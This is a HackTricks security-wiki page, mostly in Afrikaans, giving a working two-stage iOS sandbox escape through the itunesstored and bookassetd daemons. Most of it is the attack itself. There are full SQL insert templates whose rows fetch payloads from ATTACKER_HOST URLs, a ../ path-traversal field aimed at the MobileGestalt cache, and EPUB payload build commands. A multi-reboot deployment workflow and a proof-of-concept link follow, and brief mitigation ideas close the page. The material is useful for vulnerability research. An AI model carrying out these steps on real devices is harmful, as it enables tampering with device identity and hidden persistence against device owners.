itunesstored & bookassetd Sandbox Escape

Tip

Leer en oefen AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Leer en oefen GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Leer en oefen Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Ondersteun HackTricks

Oorsig

Onlangse navorsing wys dat twee vooraf-geĂŻnstalleerde iOS daemons, itunesstored (downloads manager) en bookassetd (Books / iBooks asset manager), blindelings staatmaak op gebruikers-skrifbare SQLite-metadata. Deur gemanipuleerde downloads.28.sqlitedb en BLDatabaseManager.sqlite lĂȘers plus ’n minimale EPUB-argief neer te sit, kan ’n aanvaller wat onder /var/mobile/Media/ kan skryf, hierdie daemons dwing tot willekeurige lĂȘerskrywings oor die meeste mobile-beheerde paaie binne /private/var/. Die primitives oorleef herlaaings en laat jou toe om stelselgroep-kasgeheue soos systemgroup.com.apple.mobilegestaltcache te manipuleer om toestel-eienskappe te spoof of konfigurasie te behou.

Belangrike eienskappe:

  • Werks op toestelle tot minstens iOS 26.2b1 (getoets op iPhone 12 / iOS 26.0.1).
  • Skryfbare teikens sluit in SystemGroup kasgeheue, /private/var/mobile/Library/FairPlay, /private/var/mobile/Media, en ander mobile-beheerde lĂȘers. Skrywe na root-beheerde lĂȘers misluk.
  • Vereis slegs AFC-vlak toegang (USB-lĂȘerkopie) of enige voetingspunt wat jou toelaat om die teikengelde SQLite DB’s te vervang en payloads op te laai.

Dreigmodel & Vereistes

  1. Lokale lĂȘerstelseltoegang tot /var/mobile/Media/Downloads/ en /var/mobile/Media/Books/ (via AFC-kliente soos 3uTools, i4.cn, of afcclient oor USB, of enige vorige kompromie).
  2. HTTP-bediener wat aanvaller-lĂȘers aanbied (BLDatabaseManager.sqlite, iTunesMetadata.plist, gemanipuleerde EPUB) blootgestel deur URL’s soos https://ATTACKER_HOST/fileprovider.php?type=....
  3. Vermoë om die toestel meerdere kere te herbegin sodat elke daemon sy databasis herlaai.
  4. Kennis van die Books system-group UUID sodat die Fase 1-skrywing in die regte houer beland (gevind via syslog).

Stage 1 – Misbruik van downloads.28.sqlitedb deur itunesstored

itunesstored verwerk /var/mobile/Media/Downloads/downloads.28.sqlitedb. Die asset tabel stoor URL + bestemming metadata en word as vertroude inset behandel. Deur ’n ry te skep wat na ’n aanvaller-URL wys en local_path stel op .../Documents/BLDatabaseManager/BLDatabaseManager.sqlite binne die Books SystemGroup, veroorsaak dit dat itunesstored die Books-databasis by opstart aflaai en oorskryf met aanvaller-inhoud.

Vind die Books SystemGroup UUID

  1. Versamel ’n syslog-argief met pymobiledevice3:
pymobiledevice3 syslog collect logs.logarchive
  1. Maak logs.logarchive oop in Console.app en soek na bookassetd [Database]: Store is at file:///private/var/containers/Shared/SystemGroup/<UUID>/Documents/BLDatabaseManager/BLDatabaseManager.sqlite.
  2. Neermerk <UUID> en vervang dit in die SQL-payload.

Kwaadaardige asset-ry

Fase 1 INSERT-sjabloon ```sql INSERT INTO "main"."asset" ( "pid","download_id","asset_order","asset_type","bytes_total", "url","local_path","destination_url","path_extension","retry_count", "http_method","initial_odr_size","is_discretionary","is_downloaded", "is_drm_free","is_external","is_hls","is_local_cache_server", "is_zip_streamable","processing_types","video_dimensions", "timeout_interval","store_flavor","download_token","blocked_reason", "avfoundation_blocked","service_type","protection_type", "store_download_key","etag","bytes_to_hash","hash_type","server_guid", "file_protection","variant_id","hash_array","http_headers", "request_parameters","body_data","body_data_file_path","sinfs_data", "dpinfo_data","uncompressed_size","url_session_task_id" ) VALUES ( 1234567890,6936249076851270150,0,'media',NULL, 'https://ATTACKER_HOST/fileprovider.php?type=sqlite', '/private/var/containers/Shared/SystemGroup//Documents/BLDatabaseManager/BLDatabaseManager.sqlite', NULL,'epub',6,'GET',NULL,0,0,0,1,0,0,0,0, NULL,60,NULL,466440000,0,0,0,0,'',NULL,NULL,0, NULL,NULL,NULL,X'62706c6973743030a1015f1020...',NULL,NULL,NULL,NULL,NULL,NULL,0,1 ); ```

Fields that matter:

  • url: attacker-controlled endpoint returning the malicious BLDatabaseManager.sqlite.
  • local_path: Books system-group BLDatabaseManager.sqlite file determined above.
  • Control flags: keep defaults (asset_type='media', path_extension='epub', booleans set to 0/1 as in the template) so the daemon accepts the task.

Deployment

  1. Verwyder verouderde /var/mobile/Media/Downloads/* inskrywings om races te voorkom.
  2. Vervang downloads.28.sqlitedb met die vervaardigde DB via AFC.
  3. Herbegin → itunesstored laai die Stage 2-databasis af en skep /var/mobile/Media/iTunes_Control/iTunes/iTunesMetadata.plist.
  4. Kopieer daardie plist na /var/mobile/Media/Books/iTunesMetadata.plist; Stage 2 verwag dit op daardie ligging.

Stage 2 – Misbruik van BLDatabaseManager.sqlite deur bookassetd

bookassetd het wyer filesystem-entitlements en vertrou die ZBLDOWNLOADINFO tabel. Deur ’n vals aankoop-ry in te voeg wat verwys na aanvaller-URLs en ’n traversal in ZPLISTPATH, laai die daemon jou EPUB af na /var/mobile/Media/Books/asset.epub en pak later metadata uit in enige mobile-beheerde pad bereikbaar deur ../../.. escape-sekwense.

Malicious ZBLDOWNLOADINFO row

Stage 2 INSERT-sjabloon ```sql INSERT INTO "ZBLDOWNLOADINFO" ( "Z_PK","Z_ENT","Z_OPT","ZACCOUNTIDENTIFIER","ZCLEANUPPENDING", "ZFAMILYACCOUNTIDENTIFIER","ZISAUTOMATICDOWNLOAD","ZISLOCALCACHESERVER", "ZISPURCHASE","ZISRESTORE","ZISSAMPLE","ZISZIPSTREAMABLE", "ZNUMBEROFBYTESTOHASH","ZPERSISTENTIDENTIFIER","ZPUBLICATIONVERSION", "ZSERVERNUMBEROFBYTESTOHASH","ZSIZE","ZSTATE","ZSTOREIDENTIFIER", "ZSTOREPLAYLISTIDENTIFIER","ZLASTSTATECHANGETIME","ZPURCHASEDATE", "ZSTARTTIME","ZARTISTNAME","ZARTWORKPATH","ZASSETPATH", "ZBUYPARAMETERS","ZCANCELDOWNLOADURL","ZCLIENTIDENTIFIER", "ZCOLLECTIONARTISTNAME","ZCOLLECTIONTITLE","ZDOWNLOADID", "ZDOWNLOADKEY","ZENCRYPTIONKEY","ZEPUBRIGHTSPATH","ZFILEEXTENSION", "ZGENRE","ZHASHTYPE","ZKIND","ZMD5HASHSTRINGS","ZORIGINALURL", "ZPERMLINK","ZPLISTPATH","ZSALT","ZSUBTITLE","ZTHUMBNAILIMAGEURL", "ZTITLE","ZTRANSACTIONIDENTIFIER","ZURL","ZRACGUID","ZDPINFO", "ZSINFDATA","ZFILEATTRIBUTES" ) VALUES ( 1,2,3,0,0,0,0,'',NULL,NULL,NULL,NULL, 0,0,0,NULL,4648,2,'765107108',NULL, 767991550.119197,NULL,767991353.245275,NULL,NULL, '/private/var/mobile/Media/Books/asset.epub', 'productType=PUB&salableAdamId=765107106&...', 'https://p19-buy.itunes.apple.com/...', '4GG2695MJK.com.apple.iBooks','Sebastian Saenz','Cartas de Amor a la Luna', '../../../../../../private/var/containers/Shared/SystemGroup/systemgroup.com.apple.mobilegestaltcache/Library', NULL,NULL,NULL,NULL,'Contemporary Romance',NULL,'ebook',NULL,NULL,NULL, '/private/var/mobile/Media/Books/iTunesMetadata.plist',NULL, 'Cartas de Amor a la Luna','https://ATTACKER_HOST/fileprovider.php?type=gestalt', 'Cartas de Amor a la Luna','J19N_PUB_190099164604738', 'https://ATTACKER_HOST/fileprovider.php?type=gestalt2',NULL,NULL,NULL,NULL ); ```

Important fields:

  • ZASSETPATH: EPUB-ligging op die skyf wat deur die aanvaller beheer word.
  • ZURL/ZPERMLINK: aanvaller-URL’s wat die EPUB en bykomende plist huisves.
  • ZPLISTPATH: ../../../../../private/var/containers/Shared/SystemGroup/systemgroup.com.apple.mobilegestaltcache/Library – die path traversal base wat by lĂȘers aangeheg word wat uit die EPUB onttrek is. Pas die traversal depth aan om die gewenste SystemGroup-teiken te bereik.
  • Purchase metadata (ZSTOREIDENTIFIER, names, timestamps) naboots geldige inskrywings sodat die daemon die ry nie verwerp nie.

After copying the malicious DB into /private/var/containers/Shared/SystemGroup/<UUID>/Documents/BLDatabaseManager/BLDatabaseManager.sqlite (courtesy of Stage 1) and rebooting twice, bookassetd will (1) download the EPUB, (2) process it and write the derived plist under the traversed path.

Opstel van die EPUB payload

bookassetd respekteer die EPUB ZIP-formaat: mimetype moet die eerste ongekomprimeerde item wees. Om EPUB-inhoud na die MobileGestalt cache te koppel, bou ’n gidsboom wat die gewenste pad weerspieĂ«l relatief tot ZPLISTPATH.

Caches/
├── mimetype
└── com.apple.MobileGestalt.plist

Skep die argief:

zip -X0 hax.epub Caches/mimetype
zip -Xr9D hax.epub Caches/com.apple.MobileGestalt.plist
  • mimetype bevat gewoonlik die letterlike application/epub+zip.
  • Caches/com.apple.MobileGestalt.plist hou die deur die aanvaller beheerde payload wat by .../Library/Caches/com.apple.MobileGestalt.plist sal beland.

Orkestrasie Werkvloei

  1. Berei lĂȘers voor op die aanvaller se HTTP-bediener en skep beide SQLite DBs met gastheer-/UUID-spesifieke waardes.
  2. Vervang downloads.28.sqlitedb op die toestel en herbegin → Stage 1 laai die kwaadwillige BLDatabaseManager.sqlite af en skryf /var/mobile/Media/iTunes_Control/iTunes/iTunesMetadata.plist.
  3. Kopieer iTunesMetadata.plist na /var/mobile/Media/Books/iTunesMetadata.plist (herhaal as die daemon dit verwyder).
  4. Herbegin weer → bookassetd laai asset.epub af na /var/mobile/Media/Books/ met behulp van Stage 2 metadata.
  5. Herbegin ‘n derde keer’ → bookassetd verwerk die afgelaaide asset, volg ZPLISTPATH, en skryf die EPUB-inhoud in die geteikende SystemGroup-pad (bv. com.apple.MobileGestalt.plist).
  6. Verifieer deur die oorboekte plist te lees of waar te neem dat MobileGestalt-afgeleide eienskappe (model identifier, activation flags, ens.) ooreenkomstig verander.

Dieselfde patroon laat jou toe om lĂȘers in ander deur mobile besette caches neer te sit, soos FairPlay-status of persistentie-gidse, wat stilswyende manipulasie moontlik maak sonder ’n kernel-exploit.

Gereedskap & Operasionele Aantekeninge

  • pymobiledevice3 syslog collect logs.logarchive – onttrek log-argiewe om die Books SystemGroup UUID te ontdek.
  • Console.app – filter vir bookassetd [Database]: Store is at ... om die presiese houerpad te herstel.
  • AFC clients (afcclient, 3uTools, i4.cn) – push/pull SQLite DBs en plist-lĂȘers oor USB sonder jailbreak.
  • zip – dwing EPUB-ordebeperkings af wanneer jy payloads inpak.
  • Public PoC – https://github.com/hanakim3945/bl_sbx bevat basis SQLite/EPUB-sjablone wat jy kan aanpas.

Opsporing & Versagtingsidees

  • Beskou downloads.28.sqlitedb en BLDatabaseManager.sqlite as onbetroubare insette: valideer dat local_path / ZPLISTPATH binne goedgekeurde sandboksies bly en weier volledig gekwalifiseerde paaie of traversie-tokens.
  • Moniteer vir AFC-skrifte wat hierdie databasisse vervang of vir onverwagte aflaaie geĂŻnisieer deur itunesstored / bookassetd kort nĂĄ opstart.
  • Verhard bookassetd se uitpakproses om die uitsetdoel na realpath() te resolver en seker te maak dit kan nie uit die Books-container ontsnap voordat lĂȘers geskryf word nie.
  • Beperk AFC / USB-lĂȘerkopie-kanale of vereis gebruikerinteraksie voordat die vervanging van Books/iTunes metadata-lĂȘers toegelaat word.

References

Tip

Leer en oefen AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Leer en oefen GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Leer en oefen Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Ondersteun HackTricks